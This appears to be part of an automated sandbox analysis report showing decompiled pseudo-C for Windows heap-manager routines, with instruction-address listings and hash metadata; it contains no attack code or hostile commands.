								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E013D7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x14a8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E013BB150();
							__eflags =  *0x14a7bc8;
							if( *0x14a7bc8 == 0) {
								__eflags = 0;
								E01472073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x14a8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E013BB150();
												} else {
													E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E013BB150();
												__eflags =  *0x14a7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01472073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0147A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E013DA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E013DB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E013DA830(_t553, _v64, _v24);
								_t286 = E013D7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E013D7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01471411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E013D7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E013D7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01471411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E013E174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E013DB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E013D7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E014714FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E013D99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E013DA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E013EABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                0x013da309
                                                0x013da316
                                                0x013da319
                                                0x013da31d
                                                0x013da32d
                                                0x013da331
                                                0x01421e0d
                                                0x01421e10
                                                0x013da3cb
                                                0x013da3cb
                                                0x013da3bd
                                                0x013da3c3
                                                0x013da3c3
                                                0x013da33a
                                                0x01421e17
                                                0x01421e1b
                                                0x01421e1d
                                                0x01421e2f
                                                0x01421e34
                                                0x01421e36
                                                0x01421e3c
                                                0x01421e3c
                                                0x01421e3c
                                                0x01421e3c
                                                0x01421e36
                                                0x01421e42
                                                0x01421e45
                                                0x01421e47
                                                0x013da3f8
                                                0x013da3f8
                                                0x013da3fb
                                                0x013da3fd
                                                0x01421e50
                                                0x013da403
                                                0x013da411
                                                0x013da411
                                                0x013da411
                                                0x013da41e
                                                0x013da420
                                                0x013da424
                                                0x013da427
                                                0x013da7c9
                                                0x013da7cd
                                                0x013da7d2
                                                0x013da7d9
                                                0x013da7e0
                                                0x013da7e3
                                                0x013da7ed
                                                0x013da7f3
                                                0x013da7f9
                                                0x013da7ff
                                                0x013da802
                                                0x013da807
                                                0x013da809
                                                0x013da809
                                                0x013da809
                                                0x013da80f
                                                0x013da80f
                                                0x013da812
                                                0x013da81c
                                                0x013da821
                                                0x013da824
                                                0x013da42d
                                                0x013da42d
                                                0x013da42d
                                                0x013da42d
                                                0x013da42d
                                                0x013da436
                                                0x013da43a
                                                0x013da609
                                                0x013da60d
                                                0x013da612
                                                0x013da616
                                                0x013da61a
                                                0x01421e57
                                                0x01421e59
                                                0x00000000
                                                0x00000000
                                                0x01421e5f
                                                0x013da620
                                                0x013da627
                                                0x01421e64
                                                0x01421e66
                                                0x01421e6c
                                                0x01421e72
                                                0x01421e76
                                                0x01421e95
                                                0x01421e9a
                                                0x01421e78
                                                0x01421e8d
                                                0x01421e92
                                                0x01421ea0
                                                0x01421ea5
                                                0x01421eaa
                                                0x01421eb2
                                                0x01421eb6
                                                0x01421eb9
                                                0x01421eb9
                                                0x01421ebe
                                                0x01421ec2
                                                0x01421ec2
                                                0x01421e66
                                                0x013da62d
                                                0x013da633
                                                0x013da636
                                                0x013da63a
                                                0x013da63c
                                                0x013da640
                                                0x013da642
                                                0x013da644
                                                0x013da644
                                                0x013da644
                                                0x013da64d
                                                0x013da64d
                                                0x013da651
                                                0x013da655
                                                0x01421eca
                                                0x01421ed1
                                                0x00000000
                                                0x00000000
                                                0x01421ed7
                                                0x00000000
                                                0x013da65b
                                                0x013da669
                                                0x013da66e
                                                0x013da670
                                                0x00000000
                                                0x00000000
                                                0x013da676
                                                0x013da67b
                                                0x013da680
                                                0x013da682
                                                0x01421f1a
                                                0x013da688
                                                0x013da688
                                                0x013da688
                                                0x013da68a
                                                0x013da68d
                                                0x01421f24
                                                0x01421f2a
                                                0x01421f31
                                                0x01421f43
                                                0x01421f43
                                                0x01421f31
                                                0x013da693
                                                0x013da697
                                                0x013da69d
                                                0x013da6a0
                                                0x013da6a6
                                                0x013da6a8
                                                0x013da6a8
                                                0x013da6a8
                                                0x013da6a8
                                                0x013da6b2
                                                0x013da6b7
                                                0x013da6c1
                                                0x013da6c6
                                                0x013da6d2
                                                0x013da6d9
                                                0x013da6e3
                                                0x013da6e6
                                                0x013da6eb
                                                0x013da6ed
                                                0x013da6ed
                                                0x013da6ed
                                                0x013da6ed
                                                0x013da6f3
                                                0x013da6f8
                                                0x013da702
                                                0x013da70a
                                                0x013da70e
                                                0x013da71a
                                                0x013da71e
                                                0x01421fcb
                                                0x01421fcf
                                                0x01421fdd
                                                0x01421fe3
                                                0x01421fe3
                                                0x013da724
                                                0x013da728
                                                0x013da72a
                                                0x013da72d
                                                0x013da737
                                                0x013da73a
                                                0x013da73c
                                                0x013da742
                                                0x013da748
                                                0x01421f4d
                                                0x01421f50
                                                0x01421f56
                                                0x01421f5c
                                                0x01421f5f
                                                0x01421f7e
                                                0x01421f83
                                                0x01421f61
                                                0x01421f76
                                                0x01421f7b
                                                0x01421f89
                                                0x01421f8e
                                                0x01421f93
                                                0x01421f94
                                                0x01421f9a
                                                0x01421f9c
                                                0x01421f9e
                                                0x01421fa1
                                                0x01421fa1
                                                0x01421fa6
                                                0x01421fa6
                                                0x01421f50
                                                0x013da74e
                                                0x013da751
                                                0x013da754
                                                0x013da75d
                                                0x013da75e
                                                0x013da762
                                                0x013da767
                                                0x01421faf
                                                0x01421fb0
                                                0x01421fb9
                                                0x01421fbe
                                                0x01421fc2
                                                0x01421fc2
                                                0x013da76d
                                                0x013da76d
                                                0x013da775
                                                0x013da778
                                                0x013da77d
                                                0x013da77d
                                                0x013da71e
                                                0x013da782
                                                0x013da787
                                                0x013da789
                                                0x01421ff3
                                                0x013da78f
                                                0x013da78f
                                                0x013da78f
                                                0x013da791
                                                0x013da794
                                                0x01421ffd
                                                0x01422006
                                                0x0142200c
                                                0x01422017
                                                0x01422019
                                                0x01422024
                                                0x01422024
                                                0x01422024
                                                0x01422047
                                                0x01422047
                                                0x0142200c
                                                0x013da79a
                                                0x013da79f
                                                0x013da7a4
                                                0x013da7a9
                                                0x013da7ab
                                                0x0142205a
                                                0x013da7b1
                                                0x013da7b1
                                                0x013da7b1
                                                0x013da7b3
                                                0x013da7b6
                                                0x00000000
                                                0x013da7bc
                                                0x01422066
                                                0x01422068
                                                0x01422073
                                                0x01422073
                                                0x01422073
                                                0x01422078
                                                0x01422079
                                                0x0142207d
                                                0x00000000
                                                0x0142207d
                                                0x013da7b6
                                                0x013da440
                                                0x013da440
                                                0x013da440
                                                0x013da446
                                                0x013da44c
                                                0x013da44f
                                                0x013da453
                                                0x013da455
                                                0x014220b3
                                                0x014220b9
                                                0x014220b9
                                                0x013da45d
                                                0x013da460
                                                0x013da464
                                                0x013da466
                                                0x013da46b
                                                0x013da46f
                                                0x013da471
                                                0x013da471
                                                0x013da471
                                                0x013da474
                                                0x013da479
                                                0x013da47d
                                                0x013da47f
                                                0x01422229
                                                0x0142222f
                                                0x013da3c8
                                                0x013da3c8
                                                0x013da3ca
                                                0x013da3ca
                                                0x00000000
                                                0x013da3ca
                                                0x01422235
                                                0x0142223a
                                                0x0142223a
                                                0x00000000
                                                0x00000000
                                                0x01422240
                                                0x01422246
                                                0x0142224a
                                                0x01422269
                                                0x0142226e
                                                0x0142224c
                                                0x01422261
                                                0x01422266
                                                0x01422274
                                                0x01422279
                                                0x0142227e
                                                0x01422286
                                                0x01422288
                                                0x0142228d
                                                0x0142228d
                                                0x01422292
                                                0x01422292
                                                0x01422295
                                                0x01422295
                                                0x00000000
                                                0x01422295
                                                0x013da485
                                                0x013da489
                                                0x013da48b
                                                0x013da48f
                                                0x013da493
                                                0x013da497
                                                0x013da49b
                                                0x013da4bb
                                                0x013da4bb
                                                0x013da4bd
                                                0x013da4ff
                                                0x013da4ff
                                                0x013da501
                                                0x013da505
                                                0x013da50f
                                                0x013da517
                                                0x013da51b
                                                0x013da527
                                                0x013da52b
                                                0x01422182
                                                0x01422185
                                                0x01422193
                                                0x01422199
                                                0x01422199
                                                0x013da531
                                                0x013da535
                                                0x013da538
                                                0x013da548
                                                0x013da54b
                                                0x013da54d
                                                0x013da553
                                                0x013da559
                                                0x01422100
                                                0x01422103
                                                0x01422109
                                                0x0142210f
                                                0x01422112
                                                0x01422131
                                                0x01422136
                                                0x01422114
                                                0x01422129
                                                0x0142212e
                                                0x0142213c
                                                0x01422141
                                                0x01422147
                                                0x0142214d
                                                0x01422151
                                                0x01422154
                                                0x01422154
                                                0x01422159
                                                0x01422159
                                                0x01422103
                                                0x013da55f
                                                0x013da562
                                                0x013da565
                                                0x013da567
                                                0x01422162
                                                0x013da56d
                                                0x013da574
                                                0x013da575
                                                0x013da579
                                                0x013da57e
                                                0x01422169
                                                0x0142216a
                                                0x01422170
                                                0x01422175
                                                0x01422179
                                                0x01422179
                                                0x013da57e
                                                0x013da584
                                                0x013da58f
                                                0x013da58f
                                                0x013da52b
                                                0x013da5ad
                                                0x013da5bc
                                                0x013da5c1
                                                0x013da5c6
                                                0x013da5cb
                                                0x013da5cd
                                                0x014221a9
                                                0x013da5d3
                                                0x013da5d3
                                                0x013da5d3
                                                0x013da5d5
                                                0x013da5d8
                                                0x014221b3
                                                0x014221bc
                                                0x014221c2
                                                0x014221cd
                                                0x014221cf
                                                0x014221da
                                                0x014221da
                                                0x014221da
                                                0x014221f7
                                                0x014221f7
                                                0x014221c2
                                                0x013da5de
                                                0x013da5e3
                                                0x013da5e8
                                                0x013da5ea
                                                0x0142220a
                                                0x013da5f0
                                                0x013da5f0
                                                0x013da5f0
                                                0x013da5f2
                                                0x013da5f5
                                                0x01422219
                                                0x0142221b
                                                0x0142208c
                                                0x0142208c
                                                0x0142208c
                                                0x01422095
                                                0x01422096
                                                0x01422097
                                                0x01422098
                                                0x014220a4
                                                0x014220a5
                                                0x014220a9
                                                0x014220a9
                                                0x00000000
                                                0x013da5f5
                                                0x013da4bf
                                                0x013da4d3
                                                0x013da4d8
                                                0x013da4da
                                                0x01421ede
                                                0x01421ede
                                                0x01421ee4
                                                0x01421ee9
                                                0x00000000
                                                0x00000000
                                                0x01421f07
                                                0x00000000
                                                0x01421f07
                                                0x013da4e0
                                                0x013da4e5
                                                0x013da4e7
                                                0x014220cb
                                                0x013da4ed
                                                0x013da4ed
                                                0x013da4ed
                                                0x013da4f2
                                                0x013da4f5
                                                0x014220d5
                                                0x014220de
                                                0x014220e4
                                                0x014220f6
                                                0x014220f6
                                                0x014220e4
                                                0x013da4fb
                                                0x00000000
                                                0x013da4fb
                                                0x013da4a1
                                                0x013da4a4
                                                0x013da4a8
                                                0x00000000
                                                0x00000000
                                                0x013da4aa
                                                0x013da4ac
                                                0x00000000
                                                0x00000000
                                                0x013da4b2
                                                0x013da4b5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x013da4b5
                                                0x013da43a
                                                0x013da340
                                                0x013da346
                                                0x013da600
                                                0x00000000
                                                0x013da600
                                                0x013da34f
                                                0x013da351
                                                0x013da358
                                                0x013da3c6
                                                0x00000000
                                                0x013da371
                                                0x013da37a
                                                0x013da37f
                                                0x013da382
                                                0x013da384
                                                0x013da394
                                                0x00000000
                                                0x013da396
                                                0x013da399
                                                0x013da3a7
                                                0x013da3b0
                                                0x013da3b4
                                                0x013da3bb
                                                0x013da3d2
                                                0x013da3da
                                                0x013da3df
                                                0x013da3e1
                                                0x013da3e5
                                                0x013da3ea
                                                0x013da3f0
                                                0x013da3f0
                                                0x013da3e1
                                                0x00000000
                                                0x013da3bb
                                                0x013da394

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: 176a6c6e6acf5cc8c34c16f9b98620bea6320cc929ddae10549fa431bed34868
                                                • Instruction ID: 28e4ec4f07067abe8bd84ef0266e21406e0a62dda3106cb8b2ccc260e21cac59
                                                • Opcode Fuzzy Hash: 176a6c6e6acf5cc8c34c16f9b98620bea6320cc929ddae10549fa431bed34868
                                                • Instruction Fuzzy Hash: BB4211722083819FD715CF28D984B2BBBE5FF88608F44496EF5868B361DB74D981CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01472D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E01472D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1490e80);
				E0140D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E013B40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E014730C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E013BB150();
						} else {
							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E013BB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E013CEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01474496(_t181, 0);
						_t177 = L013D4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E014749A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0146FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E013B1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E013E16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01474496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x14a6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x14a6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x14a6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0145D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E013BB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E013BB150("Just allocated block at %p for %Ix bytes\n",  *0x14a6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x14a6378 = 1;
									 *0x14a60c0 = 0;
									asm("int3");
									 *0x14a6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x14a5708; // 0x0
					 *0x14ab1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0140D130(0, _t177, _t181);
				}
			}





















                                                0x01472d82
                                                0x01472d84
                                                0x01472d89
                                                0x01472d8e
                                                0x01472d90
                                                0x01472d92
                                                0x01472d97
                                                0x01472d9a
                                                0x01472da4
                                                0x01472dc0
                                                0x01472dc3
                                                0x01472dd1
                                                0x01472dd6
                                                0x01472dd8
                                                0x014730a7
                                                0x014730a7
                                                0x014730aa
                                                0x014730aa
                                                0x014730ad
                                                0x014730b4
                                                0x00000000
                                                0x014730b9
                                                0x01472de3
                                                0x01472de8
                                                0x01472deb
                                                0x01472dee
                                                0x01472df1
                                                0x01472df3
                                                0x01472dfb
                                                0x01472dfb
                                                0x01472df5
                                                0x01472df5
                                                0x01472df5
                                                0x01472e04
                                                0x01472e0a
                                                0x01472e0d
                                                0x01472e11
                                                0x01472e11
                                                0x01472e12
                                                0x01472e15
                                                0x01472e18
                                                0x01472e1a
                                                0x01473027
                                                0x01473027
                                                0x0147302d
                                                0x01473030
                                                0x0147304f
                                                0x01473054
                                                0x01473032
                                                0x01473047
                                                0x0147304c
                                                0x0147305a
                                                0x01473063
                                                0x00000000
                                                0x01472e20
                                                0x01472e20
                                                0x01472e23
                                                0x00000000
                                                0x00000000
                                                0x01472e29
                                                0x01472e2b
                                                0x01472e47
                                                0x01472e2d
                                                0x01472e33
                                                0x01472e38
                                                0x01472e3f
                                                0x01472e42
                                                0x01472e42
                                                0x01472e4e
                                                0x01472e5d
                                                0x01472e5f
                                                0x01472e62
                                                0x01472e66
                                                0x01472e6b
                                                0x01472e6d
                                                0x00000000
                                                0x01472e73
                                                0x01472e73
                                                0x01472e76
                                                0x01472e7a
                                                0x01472e83
                                                0x01472e83
                                                0x01472e83
                                                0x01472e85
                                                0x01472e87
                                                0x01472e8a
                                                0x01472e8d
                                                0x01472e92
                                                0x01472e9c
                                                0x01472e9f
                                                0x01472ea1
                                                0x01472ea2
                                                0x01472ea6
                                                0x01472ea6
                                                0x01472e9f
                                                0x01472eab
                                                0x01472eaf
                                                0x01472edf
                                                0x01472ee2
                                                0x01472ee5
                                                0x01472eb1
                                                0x01472eb3
                                                0x01472eb8
                                                0x01472ebd
                                                0x01472ec4
                                                0x01472ed6
                                                0x01472ec6
                                                0x01472ec7
                                                0x01472ecc
                                                0x01472ecf
                                                0x01472ed2
                                                0x01472ed2
                                                0x01472ed9
                                                0x01472ed9
                                                0x01472ee8
                                                0x01472eeb
                                                0x01472eef
                                                0x01472ef2
                                                0x01472efe
                                                0x01472f04
                                                0x01472f04
                                                0x01472f04
                                                0x01472f06
                                                0x01472f0d
                                                0x01472f0f
                                                0x01472f13
                                                0x01472f13
                                                0x01472f1b
                                                0x01472f21
                                                0x01472f27
                                                0x01472f95
                                                0x01472f98
                                                0x01472f9b
                                                0x01472fa0
                                                0x00000000
                                                0x00000000
                                                0x01472fa6
                                                0x01472fa9
                                                0x01472fac
                                                0x00000000
                                                0x00000000
